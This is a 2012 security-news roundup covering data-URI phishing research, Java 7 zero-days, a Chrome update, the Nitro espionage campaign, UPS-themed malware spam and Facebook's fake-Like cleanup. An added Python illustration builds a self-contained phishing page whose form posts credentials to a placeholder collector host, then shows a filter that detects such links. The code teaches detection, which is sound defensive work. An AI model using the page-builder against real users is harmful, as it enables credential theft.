NEWS - August 31, 2012

Phishing without a webpage - researcher reveals how a link *itself* can be malicious

The need for a reliable place to host your malicious website has been the bane of phishers for much of the last decade.

A researcher at the University of Oslo in Norway says that page-less phishing and other untraceable attacks may be possible, using a tried and true internet communications standard: the uniform resource identifier, or URI.

Henning Klevjer, an information security student at the University of Oslo in Norway, suggests in a just-released research paper that it may be possible for attackers to dispense with phishing sites altogether, embedding their entire scam webpage in an encoded data URI that can be passed around from victim to victim.

URIs are strings of characters that identify a resource. The term encompasses the better-known Uniform Resource Locator (URL) and uniform resource name (URN). However, whereas URLs specify the location of a specific network resource and how it should be accessed (i.e. with HTTP, HyperText Transfer Protocol), URIs are more flexible and can even be used to host the data they "link" to.

Continued :

"Data" URLs used for in-URL phishing
Cybercriminals Could Take Phishing to the Next Level by Using URIs
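
As an added illustration (not from the article or from Klevjer's paper), the Python below builds the kind of self-contained data: URI the research describes and shows the check a mail or URL filter can apply to such a link: decode the URI's own payload, look at the MIME type and decoded body, and flag an HTML document that carries a form. The sample page and the collector host in it are constructed placeholders, not real sites.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: a minimal credential-harvesting page of the kind the
# article says can travel inside the link itself. The collector host is a
# placeholder, not a real site.
SAMPLE_PAGE = """<html><body>
<form action="http://collector.example/submit" method="post">
  Username <input name="user">
  Password <input name="pass" type="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

# RFC 2397 shape: data:[<mediatype>][;base64],<data>
DATA_URI_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)$", re.S)
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
PASSWORD_FIELD_RE = re.compile(r"<input[^>]*\btype\s*=\s*[\"']?password", re.I)


def build_data_uri(html: str, mime: str = "text/html") -> str:
    """Pack a whole page into one base64 data: URI; this is the attacker side."""
    payload = base64.b64encode(html.encode("utf-8")).decode("ascii")
    return f"data:{mime};base64,{payload}"


def decode_data_uri(uri: str):
    """Return (mime, decoded bytes) for a data: URI, or raise ValueError."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    mime = (m.group("mime") or "text/plain").lower()
    body = m.group("body")
    if ";base64" in m.group("params").lower():
        data = base64.b64decode(body)          # non-alphabet chars (newlines) are dropped
    else:
        data = unquote_to_bytes(body)          # percent-encoded form
    return mime, data


def inspect_link(uri: str) -> dict:
    """Filter-side check: decode the link's own payload and flag an embedded
    HTML document that carries a form, which is the page-less phishing case."""
    result = {"scheme": uri.split(":", 1)[0].lower(), "mime": None,
              "form_targets": [], "has_password_field": False,
              "suspicious": False}
    if result["scheme"] != "data":
        return result
    mime, data = decode_data_uri(uri)
    result["mime"] = mime
    if mime != "text/html":
        return result
    text = data.decode("utf-8", errors="replace")
    result["form_targets"] = FORM_ACTION_RE.findall(text)
    result["has_password_field"] = PASSWORD_FIELD_RE.search(text) is not None
    # The page needs no server, but the form still has to post somewhere:
    # that action URL is the one network artifact left to extract and block.
    result["suspicious"] = "<form" in text.lower()
    return result


if __name__ == "__main__":
    link = build_data_uri(SAMPLE_PAGE)
    print(link[:60] + "...")
    print(inspect_link(link))
```

The point of the filter side is that a plain URL reputation lookup has nothing to look up here: the "link" is the page. Decoding the payload and pulling out the form's action target gives the one host that can still be blocked.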
Only 9 of 22 virus scanners block Java exploit

According to an analysis conducted by the AV-Comparatives test lab on behalf of The H's associates at heise Security, less than half of the 22 anti-virus programs tested protect users against the currently circulating Java exploit that targets a highly critical vulnerability in Java version 7 Update 6.

Two versions of the exploit were tested: the basic version that was largely based on the published proof of concept and started the notepad instead of the calculator, and, for the second variant, heise Security added a download routine that writes an EXE file to disk from the internet. The test system was Windows XP that, except in the case of Avast, Microsoft and Panda, had the full versions of the security suites installed. For Avast, Microsoft and Panda, the researchers used the free versions of the products.

Only 9 of the 22 tested products managed to block both variants of the exploit (Avast Free, AVG, Avira, ESET, G Data, Kaspersky, PC Tools, Sophos and Symantec). Twelve virus scanners were found to be unsuccessful (AhnLab, Bitdefender, BullGuard, eScan, F-Secure, Fortinet, GFI-Vipre, Ikarus, McAfee, Panda Cloud Antivirus, Trend Micro and Webroot). Microsoft's free Security Essentials component at least managed to block the basic version of the exploit.

Continued :

Researchers Find Critical Vulnerability in Java 7 Patch Hours After Release

Security researchers from Poland-based security firm Security Explorations claim to have discovered a vulnerability in the Java 7 security update released Thursday that can be exploited to escape the Java sandbox and execute arbitrary code on the underlying system.

Security Explorations sent a report about the vulnerability to Oracle on Friday together with a proof-of-concept exploit, Adam Gowdiak, the security company's founder and CEO said Friday via email.

The company doesn't plan to release any technical details about the vulnerability publicly until Oracle addresses it, Gowdiak said.

Oracle broke out of its regular four-month patching cycle on Thursday to release Java 7 Update 7, an emergency security update that addressed three vulnerabilities, including two that were being exploited by attackers to infect computers with malware since last week.

Java 7 Update 7 also patched a "security-in-depth issue" which, according to Oracle, was not directly exploitable, but could have been used to aggravate the impact of other vulnerabilities.

Continued :

Oracle patches Java 0-day, researchers say there's another one
Java Users Still Not Safe, Experts Report New Vulnerability to Oracle
Chrome 21 update closes high-risk security holes

Three high-severity holes have been fixed in Google's latest stable channel update to the Chrome web browser. Version 21.0.1180.89 of Chrome for Windows, Mac OS X and Linux addresses a total of nine vulnerabilities in the web browser, and fixes a number of non-security issues with Flash, developer tools and gradient boxes.

The high severity vulnerabilities include two incidents of bad casting, when handling XSL transforms and run-ins, and a stale buffer appearing when loading URLs. Additionally, the update fixes three medium-risk and three low-risk issues. In total, Google paid security researchers $3,500 for discovering and reporting these holes as part of its Chromium Security Vulnerability Rewards program. As usual, further details about the security holes have not yet been disclosed, in order to allow affected users to update to the new version.

Chrome 21.0.1180.89 is available for Windows, Mac OS X and Linux; existing users can upgrade using the built-in update function. Chrome is built from Chromium, the open source browser project run by Google.

The "Nitro" Campaign and Java Zero-Day

From TrendLabs Malware Blog:

The security community has been focused on the new Java zero-day exploits that appear to have been taken from a Chinese exploit pack (known as Gondad or KaiXin) used in targeted attacks by the "Nitro" cyber-espionage campaign and then incorporated into criminal operations using the BlackHole Exploit Kit. While the connections between these developments are starting to emerge, it is important to remember that campaigns, such as Nitro, don't "come back" because they don't go away. The Nitro attackers continued to be active after their activities were documented in 2011.

In fact, before they acquired this Java exploit, the Nitro attackers were continuing to send out emails to their targets with direct links to Poison Ivy executables in early August 2012 (On a related note, another email was spotted in April 2012). [Screenshot: Sample Email]

The file Flashfxp.exe was hosted on one of the same servers that hosted the Java zero-day and Poison Ivy payload, and it connects to ok.{BLOCKED}, which resolves to the same IP address, {BLOCKED}.{BLOCKED}.233.244. This is the same address as hello.{BLOCKED}, the domain used as the command and control server for the Poison Ivy payload dropped by the Java zero-day.

Continued :

Cybercriminals impersonate UPS, serve malware

Dancho Danchev @ the Webroot Threat Blog:

Cybercriminals are currently mass mailing millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick users into downloading and executing the malicious file hosted on a compromised web site.

More details:

Sample screenshot of the spamvertised email: [Screenshot]

Spamvertised URL: hxxp://

Actual download location of the malicious archive: hxxp://

The malicious file has MD5 b702590c01f76f02e2d8d98833d1c95f and is detected by 36 out of 42 antivirus scanners as Trojan-Downloader.Win32.Kuluoz.z; TrojanDownloader:Win32/Kuluoz.B.

Facebook puts fraudulent "Likes" on notice

"Scammers, time to tweak your techniques again."

Facebook engineers have rolled out new technology that automatically removes fraudulent Likes that are mass-produced to exaggerate the popularity of a webpage or brand.

The social network recently increased its learning algorithms to detect the spammed endorsements, which are often generated by computers, fake Facebook accounts, or other fraudulent means, the company said on its security blog Friday morning. The post said the inauthentic Likes are a tiny sliver of the overall endorsements on the site; on average, less than one percent of the Likes on any given page are expected to be affected. We're guessing, however, that certain pages—say, some promoting things like male enhancement pills—will be heavily hit.

"These newly improved automated efforts will remove those Likes gained by malware, compromised accounts, deceived users, or purchased bulk Likes," the Facebook post stated. "While we have always had dedicated protections against each of these threats on Facebook, these improved systems have been specifically configured to identify and take action against suspicious Likes."

Continued :
